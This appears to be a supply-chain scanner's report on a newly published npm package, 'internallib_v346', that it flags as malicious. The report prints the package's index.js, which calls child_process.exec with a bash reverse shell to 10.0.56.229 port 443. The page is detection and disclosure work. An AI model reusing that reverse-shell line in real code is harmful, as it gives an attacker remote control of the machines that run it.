// npm 패키지
internallib_v346
버전
1
메인테이너
1
라이선스
ISC
최초 publish
2026-06-03
publisher
b4lr0g
tarball
1,614 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-06-03
// exfil path
what is read → where it shipssteals
(no specific credential-read flag matched)
sends to
- ⚙ reverse shell(fetches + executes remote payload)
// offending code· @1.0.3· 1 file flagged
llm: malicious · 0.95→ 정적 분석기가 reverse-shell 패턴 검출 — 설치 경로에 원격 코드 실행 형태가 그대로 드러남.
- @1.0.3··AUTO-PUBLISHED·publisher: b4lr0gheuristic 40/100static flags 2llm malicious (0.95) via fast-tracknew-publisher:0dfirst-version-of-packagechild-process-spawnreverse-shell
→ 정적 분석기가 reverse-shell 패턴 검출 — 설치 경로에 원격 코드 실행 형태가 그대로 드러남.
// offending code· 1 file flaggedpatterns: 2
--- package/index.js (excerpt) --- const { exec } = require('child_process'); exports.command = function(){ console.log("pwned"); exec('/bin/bash -c "bash -i >& /dev/tcp/10.0.56.229/443 0>&1"'); return "ok"; } exports.command = function() { console.log("This is a message from the internal lib"); return "Command Execute with Success"; } --- package.json (entry) --- { "name": "internallib_v346", "version": "1.0.3", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "internallib_v346": "^1.0.0" } } --- index.js (entry) --- const { exec } = require('child_process'); exports.command = function(){ console.log("pwned"); exec('/bin/bash -c "bash -i >& /dev/tcp/10.0.56.229/443 0>&1"'); return "ok"; } exports.command = function() { console.log("This is a message from the internal lib"); return "Command Execute with Success"; }
